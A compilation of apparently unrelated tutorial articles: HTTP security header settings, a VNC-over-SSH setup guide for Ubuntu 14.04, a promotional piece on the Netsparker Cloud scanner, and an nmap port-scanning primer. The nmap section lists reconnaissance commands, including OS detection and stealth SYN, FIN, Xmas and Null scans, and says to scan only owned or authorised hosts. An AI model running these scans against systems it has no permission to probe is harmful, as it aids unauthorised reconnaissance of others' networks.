Visit the test cases and view the various options and how the browser responds to framing the resources.

Strict-Transport-Security

Purpose

The Strict Transport Security (STS) header is for configuring user-agents to only communicate with the server over a secure transport. It is primarily used to protect against man-in-the-middle attacks by forcing all further communications to occur over TLS. Internet Explorer does not currently support the STS header. It should be noted that setting this header on a plain HTTP response has no effect, since the values could easily be forged by an active attacker. To combat this bootstrapping problem, many browsers contain a preloaded list of sites that are configured for STS.

Valid Settings

The following values must exist over the secure connection (HTTPS) and are ineffective if accessed over HTTP.
  • max-age=31536000 - Tells the user-agent to cache the domain in the STS list for one year.
  • max-age=31536000; includeSubDomains - Tells the user-agent to cache the domain in the STS list for one year and include any sub-domains.
  • max-age=0 - Tells the user-agent to remove, or not cache the host in the STS cache.
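A typical deployment combines the one-year max-age with includeSubDomains. An Nginx sketch (remember that the header only takes effect when served over HTTPS):
 add_header Strict-Transport-Security "max-age=31536000; includeSubDomains";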

Common Invalid Settings

  • Setting the includeSubDomains directive on https://www.example.com where users can still access the site at http://example.com. If example.com does not redirect to https://example.com and set the STS header, only direct requests to http://www.example.com will be automatically redirected to https://www.example.com by the user-agent.
  • max-age=60 - This only sets the domain in the STS cache for 60 seconds. This is not long enough to protect a user who accesses the site, goes to their local coffee shop and attempts to access the site over http first.
  • max-age=31536000 includeSubDomains - Directives must be separated by a ;. In this case Chrome will not add the site to the STS cache even though the max-age value is correct.
  • max-age=31536000, includeSubDomains - Same as above.
  • max-age=0 - While this is technically a valid configuration, many sites set it accidentally, thinking a value of 0 means forever.

How To Test

Determining whether a host is in your STS cache is possible by accessing "chrome://net-internals/#hsts" in Google Chrome. First, check if the domain is in the STS cache by using the Query Domain option. Next, visit the site that returns the STS header over HTTPS and attempt to query it again to determine if it was added successfully.

Public-Key-Pins (Draft Header)

Purpose

This header is still under draft specification, but it may have clear security impact, so it has been added to this list. The purpose of the Public-Key-Pins (PKP) header is to allow site operators to provide hashed public key information to be stored in the browser's cache. Much like the Strict-Transport-Security header, it helps protect users from active man-in-the-middle attacks. The header may include multiple pin- directives, for example pin-sha256=base64(sha256(SPKI)). The base64-encoded sha256 hash is the result of hashing the Subject Public Key Info (SPKI) field of an X.509 certificate. While the specification or implementations may change, it was observed that not encapsulating the hashes in quotes is invalid, and such hashes will not be added to the PKP cache in Chrome 33.
This header acts much like STS, supporting the max-age and includeSubDomains directives. Additionally, PKP supports a Public-Key-Pins-Report-Only header, which can be used to report violations without enforcing the pinning of certificate information; however, this does not appear to be implemented in Chrome yet.

Valid Settings

  • max-age=3000; pin-sha256="d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM="; - Pins this host for 3000 seconds using the base64 encoded sha256 hash of the x.509 certificate's Subject Public Key Info with hashes properly encapsulated in quotes.
  • max-age=3000; pin-sha256="d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM="; report-uri="http://example.com/pkp-report" - Same as above but allows violations to be reported. Note that if this value is sent in the Public-Key-Pins header the user-agent should enforce and report violations. If the value is sent in Public-Key-Pins-Report-Only it will not be enforced but violations will be reported to the defined site.

Common Invalid Settings

  • max-age=3000; pin-sha256=d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM=; - Not encapsulating the hash value in quotes leads to Chrome 33 not adding the keys to the PKP cache. This mistake was observed in all but one of the four sites that returned this or the report-only header response.

How To Test

Using the same method as for Strict-Transport-Security, additional information should be visible under the pubkey_hashes field if the site's PKP hashes were added successfully.

Access-Control-Allow-Origin

Purpose

Access-Control-Allow-Origin is part of the Cross Origin Resource Sharing (CORS) specification. This header is used to determine which sites are allowed to access the resource, by defining either a single origin or all sites (denoted by a wildcard value). It should be noted that if the resource has the wildcard value set, then the Access-Control-Allow-Credentials option will not be valid and the user-agent's cookies will not be sent in the request.

Valid Settings

  • * - Wildcard value allowing any remote resource to access the content of the resource which returned the Access-Control-Allow-Origin header.
  • http://www.example.com - A single serialized origin (http://[host], or https://[host]).
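You can observe the header's behavior with curl by supplying an Origin request header (all host names below are placeholders):
 curl -i -H "Origin: http://www.example.com" http://api.example.com/resource
Look for Access-Control-Allow-Origin: http://www.example.com (or *) among the response headers; if it is absent or does not match the requesting origin, the browser will block the cross-origin read.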

Common Invalid Settings

  • http://example.com, http://web2.example.com - Multiple serialized origins separated by a comma or space. Only a single origin is possible.
  • *.example.com - Wildcard subdomain origins defined such as: *.domain.com. Only a single origin is possible.
  • http://*.example.com - Same as above

How To Test

It is easy to determine if the header is configured properly because if it is not, the CORS request will simply fail to return any data.

Content-Security-Policy 1.0

Purpose

Content Security Policy is a collection of directives which can be used to restrict how a page loads various resources. Currently, Internet Explorer only supports a subset of CSP, and only with the X-Content-Security-Policy header. Chrome and Firefox currently support CSP 1.0, while version 1.1 of the policy is being developed. Configured properly, it can help protect a site's resources from various attacks, such as XSS and UI redressing related issues.
There are 10 possible directives which can each be configured to restrict when and how resources are loaded.
  • default-src - This directive sets defaults for script-src, object-src, style-src, img-src, media-src, frame-src, font-src and connect-src. If none of the previous directives exist in the policy the user-agent will enact the rules of the default-src values.
  • script-src - Also has two additional settings:
    • unsafe-inline - Allows the resource to execute script code. An example would be code that exists in an HTML element's on* event values, or the text content of a script element inside the protected resource.
    • unsafe-eval - Allows the resource to execute code dynamically in functions, such as eval, setTimeout, setInterval, new Function etc.
  • object-src - Determines where plugins can be loaded and executed from.
  • style-src - Determines where CSS or style markup can be loaded from.
  • img-src - Determines where images can be loaded from.
  • media-src - Determines where video or audio data can be loaded from.
  • frame-src - Determines where frames can be embedded from.
  • font-src - Determines where fonts can be loaded from.
  • connect-src - Restricts which resources can be used in XMLHttpRequest, WebSocket and EventSource.
  • sandbox - An optional directive which specifies a sandbox policy for 'safely' embedding content into a sandbox.
There is also the report-uri directive which can be used to send reports when the policy is violated to a specified URL. This can be helpful for both debugging and being notified of an attack.
Additionally, a second header of Content-Security-Policy-Report-Only can be defined to not enforce CSP but to send potential violations to a report URL. It follows the same syntax and rules as the Content-Security-Policy header.
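Putting a few directives together, a modest starting policy served from Nginx might look like the sketch below (the CDN host and report path are placeholders):
 add_header Content-Security-Policy "default-src 'self'; script-src 'self' https://cdn.example.com; report-uri /csp-report";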

How To Test

Open the developer panel and view the console in Chrome or Firefox to view any potential violations while debugging a site.

Install and Configure VNC on Ubuntu 14.04

Introduction

VNC, or "Virtual Network Computing", is a connection system that allows you to use your keyboard and mouse to interact with a graphical desktop environment on a remote server. VNC makes managing files, software, and settings on a remote server easier for users who are not yet comfortable with working with the command line.
In this guide, we will be setting up VNC on an Ubuntu 14.04 server and connecting to it securely through an SSH tunnel. The VNC server we will be using is TightVNC, a fast and lightweight remote control package. This choice will ensure that our VNC connection will be smooth and stable even on slower Internet connections.

Step One — Install Desktop Environment and VNC Server

By default, most Linux server installations will not come with a graphical desktop environment. If this is the case, we'll need to begin by installing one that we can work with. In this example, we will install XFCE4, which is very lightweight while still being familiar to most users.
We can get the XFCE packages, along with the package for TightVNC, directly from Ubuntu's software repositories using apt:
sudo apt-get update
sudo apt-get install xfce4 xfce4-goodies tightvncserver
To complete the VNC server's initial configuration, use the vncserver command to set up a secure password:
vncserver
(After you set up your access password, you will be asked if you would like to enter a view-only password. Users who log in with the view-only password will not be able to control the VNC instance with their mouse or keyboard. This is a helpful option if you want to demonstrate something to other people using your VNC server.)
vncserver completes the installation of VNC by creating default configuration files and connection information for our server to use. With these packages installed, you are ready to configure your VNC server and graphical desktop.

Step Two — Configure VNC Server

First, we need to tell our VNC server what commands to perform when it starts up. These commands are located in a configuration file called xstartup. Our VNC server has an xstartup file preloaded already, but we need to use some different commands for our XFCE desktop.
When VNC is first set up, it launches a default server instance on port 5901. This port is called a display port, and is referred to by VNC as :1. VNC can launch multiple instances on other display ports, like :2, :3, etc. When working with VNC servers, remember that :X is a display port that refers to 5900+X.
Since we are going to be changing how our VNC servers are configured, we'll need to first stop the VNC server instance that is running on port 5901:
vncserver -kill :1
Before we begin configuring our new xstartup file, let's back up the original in case we need it later:
mv ~/.vnc/xstartup ~/.vnc/xstartup.bak
Now we can open a new xstartup file with nano:
nano ~/.vnc/xstartup
Insert these commands into the file so that they are performed automatically whenever you start or restart your VNC server:
#!/bin/bash
xrdb $HOME/.Xresources
startxfce4 &
The first command in the file, xrdb $HOME/.Xresources, tells VNC's GUI framework to read the server user's .Xresources file. .Xresources is where a user can make changes to certain settings of the graphical desktop, like terminal colors, cursor themes, and font rendering.
The second command simply tells the server to launch XFCE, which is where you will find all of the graphical software that you need to comfortably manage your server.
To ensure that the VNC server will be able to use this new startup file properly, we'll need to grant executable privileges to it:
sudo chmod +x ~/.vnc/xstartup

Step Three — Create a VNC Service File

To easily control our new VNC server, we should set it up as an Ubuntu service. This will allow us to start, stop, and restart our VNC server as needed.
First, open a new service file in /etc/init.d with nano:
sudo nano /etc/init.d/vncserver
The first block of data will be where we declare some common settings that VNC will be referring to a lot, like our username and the display resolution.
#!/bin/bash
PATH="$PATH:/usr/bin/"
export USER="user"
DISPLAY="1"
DEPTH="16"
GEOMETRY="1024x768"
OPTIONS="-depth ${DEPTH} -geometry ${GEOMETRY} :${DISPLAY} -localhost"
. /lib/lsb/init-functions
Be sure to replace user with the non-root user that you have set up, and change 1024x768 if you want to use another screen resolution for your virtual display.
Next, we can start inserting the command instructions that will allow us to manage the new service. The following block binds the command needed to start a VNC server, and feedback that it is being started, to the command keyword start.
case "$1" in
start)
log_action_begin_msg "Starting vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vncserver ${OPTIONS}"
;;
The next block creates the command keyword stop, which will immediately kill an existing VNC server instance.
stop)
log_action_begin_msg "Stopping vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vncserver -kill :${DISPLAY}"
;;
The final block is for the command keyword restart, which simply combines the two previous commands (stop and start) into one.
restart)
$0 stop
$0 start
;;
esac
exit 0
Once all of those blocks are in your service script, you can save and close that file. Make this service script executable, so that you can use the commands that you just set up:
sudo chmod +x /etc/init.d/vncserver
Now try using the service command to start a new VNC server instance:
sudo service vncserver start

Step Four — Connect to Your VNC Desktop

To test your VNC server, you'll need to use a client that supports VNC connections over SSH tunnels. If you are using Windows, you could use TightVNC, RealVNC, or UltraVNC. Mac OS X users can use the built-in Screen Sharing, or can use a cross-platform app like RealVNC.
First, we need to create an SSH connection on your local computer that securely forwards to the localhost connection for VNC. You can do this via the terminal on Linux or OS X via the following command:
(Remember to replace user and server_ip_address with the username and IP you used to connect to your server via SSH.)
ssh -L 5901:127.0.0.1:5901 -N -f -l user server_ip_address
If you are using a graphical SSH client, like PuTTY, use server_ip_address as the connection IP, and set localhost:5901 as a new forwarded port in the program's SSH tunnel settings.
Next, you can use your VNC viewer to connect to the VNC server at localhost:5901. Make sure you don't forget that :5901 at the end, as that is the only port that the VNC instance is accessible from.
Once you are connected, you should see the default XFCE desktop, ready for configuration and use!

Once you have verified that the VNC connection is working, add your VNC service to the default services, so that it will automatically start whenever you boot your server:
sudo update-rc.d vncserver defaults

Netsparker Cloud Online Security Scanner

Netsparker announced that their new online web application security service offering Netsparker Cloud is in its final stages of development and is available in BETA. This means that you can now apply for a free trial of Netsparker Cloud and check out all the new features to see how your business can benefit from them.

What is Netsparker Cloud?

As the name implies, Netsparker Cloud is a cloud-based web application security and vulnerability scanner that any organization can use to scan its websites and uncover vulnerabilities and security flaws that could leave the business exposed to malicious attacks.
Netsparker Cloud is not just another ordinary online scanner. It has a number of enterprise-level features built specifically to help large organizations, which may have hundreds or even thousands of websites, ensure the security of all of them in an easy and manageable way. And it is not just about the features: the Netsparker Cloud scanning engine is one of the best out there because it is built around the already proven scanning engine of Netsparker Web Application Security Scanner.

A Bit of Netsparker History

For those of you who are not familiar with Netsparker and their web security scanner, Netsparker is a very young company, probably the youngest in the web application security industry, but don't underestimate it. The first version of Netsparker was released in early 2010. Since then, Netsparker has taken great strides and its scanner has been continuously improving; nowadays, Netsparker Web Application Security Scanner is considered one of the market leaders in the industry. Its leading performance in terms of crawling capabilities and vulnerability detection is clearly shown in the latest independent web application security scanner comparison conducted by security expert Shay Chen, where Netsparker led the field, matching the performance of scanners that cost at least four times as much.
Apart from leading the field by identifying the most vulnerabilities, Netsparker also has its own unique cutting-edge technology: automatic exploitation of vulnerabilities. What does this mean for you? It means that Netsparker is the first, and so far the only, web application security scanner that does not report any false positives. And why should this be important to you?
Well, it is very important; let me explain why. It is a well-known fact that automated security tools generate a lot of false positives, so users spend countless hours verifying the scanner's results to check which of the reported vulnerabilities are real. From a business, financial, and operations point of view, this does not make sense: what is the use of an automated tool when you have to manually verify its results? It defeats the whole purpose of automation. It raises costs and hinders the process of securing web applications, and in practice it leads to a lot of vulnerabilities being left unchecked, as explained in "The Problem of False Positives in Web Application Security and How to Tackle Them".

A Deeper Look Into Netsparker Cloud

The Obvious, Scalability – Scan as Much as You Want When You Want

I won't ramble much about this, but it is always worth a mention. There are a number of advantages that large organizations can leverage when using a cloud-based product such as Netsparker Cloud; the most relevant is scalability. Large organizations have hundreds or even thousands of web applications, and scanning them all to ensure that none of them has any security flaws can be a bit of a nightmare, to say the least.
In fact, many try to build their own in-house web scanning solution, but most of them fail because such solutions are very difficult to maintain, do not scale well, and are not as good as off-the-shelf scanners at detecting vulnerabilities. With Netsparker Cloud, on the other hand, large organizations can scan as many websites as they want, whenever they want, without hassling with on-premise software licenses or hardware on which to run them.

Always Up to Date

Imagine a new vulnerability being exploited in the wild, as we have seen lately with Heartbleed and Shellshock. If your organization has its own in-house solution, a security check first has to be developed, then tested, and then implemented before the scanners can use it. If you are using on-premise scanning software, you have to update all of the running instances before scanning all your websites. This might not be an issue if you have a few installations, but if you are scanning hundreds or thousands of sites, you most probably have quite a few installations, and updating that many installs is definitely not the way to go, because again it consumes a lot of resources and time.
Netsparker Cloud, on the other hand, is always up to date. By the time a vulnerability is making headlines, Netsparker's engineers will already have added the security checks for it to Netsparker Cloud, so all you have to do is log in and launch the security scans; if you are using groups, this should be just a quick one-minute job.

Multi User Environment

This is another must-have enterprise feature: Netsparker Cloud multi-user support. When you subscribe to a Netsparker Cloud account, you can create as many users as you want within that account. You can assign different privileges to each user; for example, one can only view the scan results, another can only launch security scans, and a third can add new websites to the Netsparker Cloud account.
This means that everyone involved in the process of securing web applications, including managers, supervisors, developers, testers, and even consultants, can log in and do their job without waiting for instructions, ensuring that any security issues are remediated immediately.

API and SDLC Integration

Netsparker Cloud also has an API that allows developers to configure new scans, modify existing scans, launch new scans, and do almost anything else programmatically. Therefore, integrating web application security scanning into your SDLC is not just possible now, but also very easy to do. There are several benefits to integrating web application security scans throughout every stage of the SDLC.
For example, when security is considered at every stage of the development of a website, you do not only get a more secure website; addressing security issues also becomes much easier. When security is not thought about in the early stages of development, remediating vulnerabilities might be too costly, if not impossible, because the fundamentals of the design do not cater for such fixes.

Better Management of Your Web Application Security Program

Scanning websites and generating reports is one thing; consolidating all the information and using it to remediate security flaws and improve the security of all your websites in a timely manner is another. When you use Netsparker Cloud, all your web application security reports and data are centralized and easily accessible to all team members, thanks to the multi-user support. Hence, developers can start remediating security flaws as soon as the scans are ready, without waiting for the reports to pass through all the bureaucratic procedures.
Managers can also get an overview of the security state of all the websites in their organization through the different reports Netsparker Cloud has available. For example, they can get an overview of a specific website from the website dashboard, where a number of graphs highlight the number and type of vulnerabilities identified on that website.

Of course, there are also developer reports, which include an extensive amount of detail about each detected vulnerability, including the vulnerable parameter, the payload used for testing, and practical information on how to remediate the issue.

There are also the correlated trending reports, which not only enable managers to get an overview of the current security state of a website, but also show how it has evolved. Trending reports also allow managers to keep an eye on the performance of each developer, because they highlight the changes in vulnerabilities across a number of scans. For example, from such reports you can see when a vulnerability was first identified in the web application, when it was fixed, and if and when it reappeared.


Netsparker Cloud is a Fully Configurable Scanner

One common problem users are wary of with cloud-based products is a lack of flexibility in terms of configuration. When comparing the online and on-premise editions of a piece of software, the cloud-based edition is typically very limited, mostly because many of the features were never ported. This is not the case with Netsparker Cloud: whatever can be configured in the scanner that is installed on your computer can also be configured in its online counterpart, Netsparker Cloud.

Netsparker Cloud Free Trial

There are many other neat features that make Netsparker Cloud an ideal solution for organizations of any size, but it is not possible to mention them all in this article. Hence I recommend you check out all the features for yourself and see how much your organization can benefit, and save in terms of budget, when using Netsparker Cloud. Start today and apply for a free Netsparker Cloud trial.

Summary – Cloudy Days Help Organizations Have More Secure Websites!

As we have just seen, organizations can benefit a lot from using Netsparker Cloud. Having said that, this does not mean that on-premise software such as Netsparker Web Application Security Scanner is of no use anymore; there is still a lot of room for such software in the web application security ecosystem. It all depends on what your requirements are.
If you only have a few websites and a one-person or small team, or if you frequently do penetration tests on your customers' premises, then most of the time Netsparker Web Application Security Scanner is your tool of choice. On the other hand, if your hair is falling out because you cannot cope with the stress of managing the security of hundreds or thousands of web applications, then Netsparker Cloud is the way to go, since it has a good number of features that you can leverage to ease your daily job and ensure the security of all the websites in your organization. Netsparker Cloud is also available as an on-premise solution, allowing you to also scan websites and portals that are only accessible from inside your network.

Nmap Scanning basics

Introduction

Networking is an expansive and overwhelming topic for many budding system administrators. There are various layers, protocols, and interfaces, and many tools and utilities that must be mastered to understand them.
This guide will cover the concept of "ports" and will demonstrate how the nmap program can be used to get information about the state of a machine's ports on a network.

What Are Ports?

There are many layers in the OSI networking model. The transport layer is the layer primarily concerned with the communication between different services and applications.
This layer is the main layer that ports are associated with.

Port Terminology

Some knowledge of terminology is needed to understand port configuration. Here are some terms that will help you understand the discussion that will follow:
  • Port: An addressable network location implemented inside of the operating system that helps distinguish traffic destined for different applications or services.
  • Internet Sockets: A file descriptor that specifies an IP address and an associated port number, as well as the transfer protocol that will be used to handle the data.
  • Binding: The process that takes place when an application or service uses an internet socket to handle the data it is inputting and outputting (see the short example after this list).
  • Listening: A service is said to be "listening" on a port when it is binding to a port/protocol/IP address combination in order to wait for requests from clients of the service.
    Upon receiving a request, it then establishes a connection with the client (when appropriate) using the same port it has been listening on. Because the internet sockets used are associated with a specific client IP address, this does not prevent the server from listening for and serving requests to other clients simultaneously.
  • Port Scanning: Port scanning is the process of attempting to connect to a number of sequential ports, for the purpose of acquiring information about which are open and what services and operating system are behind them.
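A quick way to see binding and listening in practice is to start a throwaway listener and then inspect it. This is only a sketch: it assumes the netcat (nc) utility is installed, and some netcat variants require -p before the port number:
# Start a temporary TCP listener on port 8080 in the background
nc -l 8080 &
# Confirm that a process is now bound to, and listening on, that port
sudo netstat -plnt | grep 8080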

Common Ports

Ports are specified by a number ranging from 1 to 65535.
  • Many ports below 1024 are associated with services that Linux and Unix-like operating systems consider critical to essential network functions, so you must have root privileges to assign services to them.
  • Ports between 1024 and 49151 are considered "registered". This means that they can be "reserved" (in a very loose sense of the word) for certain services by issuing a request to the IANA (Internet Assigned Numbers Authority). They are not strictly enforced, but they can give a clue as to the possible services running on a certain port.
  • Ports between 49152 and 65535 cannot be registered and are suggested for private use.
Because of the vast number of available ports, you won't ever have to be concerned with the majority of the services that tend to bind to specific ports.
However, there are some ports that are worth knowing due to their ubiquity. The following is only a very incomplete list:
  • 20: FTP data
  • 21: FTP control port
  • 22: SSH
  • 23: Telnet <= Insecure, not recommended for most uses
  • 25: SMTP
  • 43: WHOIS protocol
  • 53: DNS services
  • 67: DHCP server port
  • 68: DHCP client port
  • 80: HTTP traffic <= Normal web traffic
  • 110: POP3 mail port
  • 113: Ident authentication services on IRC networks
  • 143: IMAP mail port
  • 161: SNMP
  • 194: IRC
  • 389: LDAP port
  • 443: HTTPS <= Secure web traffic
  • 587: SMTP <= message submission port
  • 631: CUPS printing daemon port
  • 666: DOOM <= This legacy FPS game actually has its own special port
These are just a few of the services commonly associated with ports. You should be able to find the appropriate ports for the applications you are trying to configure within their respective documentation.
Most services can be configured to use ports other than the default, but you must ensure that both the client and server are configured to use a non-standard port.
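As a concrete sketch, assuming an Ubuntu server running OpenSSH: to move SSH to a non-standard port, you would change the Port directive on the server and pass the matching port on the client:
# Server side: edit /etc/ssh/sshd_config and change "Port 22" to, e.g., "Port 2222",
# then restart the daemon so the change takes effect
sudo service ssh restart

# Client side: connect to the non-standard port explicitly
ssh -p 2222 user@server_ip_address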
You can get a short list of some common ports by typing:
less /etc/services
It will give you a list of common ports and their associated services:
. . .
tcpmux          1/tcp                           # TCP port service multiplexer
echo            7/tcp
echo            7/udp
discard         9/tcp           sink null
discard         9/udp           sink null
systat          11/tcp          users
daytime         13/tcp
daytime         13/udp
netstat         15/tcp
qotd            17/tcp          quote
msp             18/tcp                          # message send protocol
. . .
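If you are only interested in a single port or service, grep is quicker than paging through the whole file:
grep -w '22/tcp' /etc/services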
We will see in the section about nmap how to get a more complete list.

How To Check Your Own Open Ports

There are a number of tools that can be used to scan for open ports.
One that is installed by default on most Linux distributions is netstat.
You can quickly discover which services you are running by issuing the command with the following parameters:
sudo netstat -plunt
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      785/sshd        
tcp6       0      0 :::22                   :::*                    LISTEN      785/sshd 
This shows the port and listening socket associated with the service and lists both UDP and TCP protocols.
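On distributions that ship the newer iproute2 tools, the ss utility accepts the same flags and produces equivalent output:
sudo ss -plunt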

How To Scan Ports with Nmap

Nmap can reveal a lot of information about a host. It can also make system administrators of the target system think that someone has malicious intent. For this reason, only test it on servers that you own or in situations where you've notified the owners.
The nmap creators actually provide a test server located at:
scanme.nmap.org
This server and your own VPS instances are good targets for practicing with nmap.
Here are some common operations that can be performed with nmap. We will run them all with sudo privileges to avoid returning partial results for some queries. Some commands may take a long while to complete:
Scan for the host operating system:
sudo nmap -O remote_host
Skip the network discovery portion and assume the host is online. This is useful if you get a reply that says "Note: Host seems down" in your other tests. Add this to the other options:
sudo nmap -PN remote_host
Specify a range with "-" or "/24" to scan a number of hosts at once:
sudo nmap -PN xxx.xxx.xxx.xxx-yyy
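For example, to sweep an entire (hypothetical) /24 private network, either notation works:
sudo nmap -PN 192.168.1.1-254
sudo nmap -PN 192.168.1.0/24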
Scan a network range for available hosts (a "ping scan" that checks which hosts are up without scanning their ports):
sudo nmap -sP network_address_range
Scan without performing a reverse DNS lookup on the IP address specified. This should speed up your results in most cases:
sudo nmap -n remote_host
Scan a specific port instead of all common ports:
sudo nmap -p port_number remote_host
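The -p flag also accepts comma-separated lists and ranges, which lets you check several ports in one pass:
sudo nmap -p 22,80,443 remote_host
sudo nmap -p 1-1000 remote_host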
To scan for TCP connections, nmap can perform a 3-way handshake (explained below) with the targeted port. Execute it like this:
sudo nmap -sT remote_host
To scan for UDP connections, type:
sudo nmap -sU remote_host
Scan for every TCP and UDP open port:
sudo nmap -n -PN -sT -sU -p- remote_host
A TCP "SYN" scan exploits the way that TCP establishes a connection.
To start a TCP connection, the requesting end sends a "synchronize request" packet to the server. The server then sends a "synchronize acknowledgment" packet back. The original sender then sends an "acknowledgment" packet back to the server, and a connection is established.
A "SYN" scan, however, drops the connection when the first packet is returned from the server. This is called a "half-open" scan and used to be promoted as a way to surreptitiously scan for ports, since the application associated with that port would not receive the traffic, because the connection is never completed.
This is no longer considered stealthy, given the adoption of more advanced firewalls and the flagging of incomplete SYN requests in many configurations.
To perform a SYN scan, execute:
sudo nmap -sS remote_host
A more stealthy approach is to send invalid TCP headers: if the host conforms to the TCP specification, a closed port will send an RST packet back, while an open port will send nothing. This works against non-Windows-based servers.
You can use the "-sF", "-sX", or "-sN" flags. They all will produce the response we are looking for:
sudo nmap -PN -p port_number -sN remote_host
To see what version of a service is running on the host, you can try this command. It tries to determine the service and version by testing different responses from the server:
sudo nmap -PN -p port_number -sV remote_host
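Once scans start taking a while to complete, it is worth saving the results for later review. Nmap can write its normal output to a file with the -oN flag (or all of its output formats at once with -oA):
sudo nmap -sV -oN scan_results.txt remote_host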
There are many other command combinations that you can use, but this should get you started on exploring your networking vulnerabilities.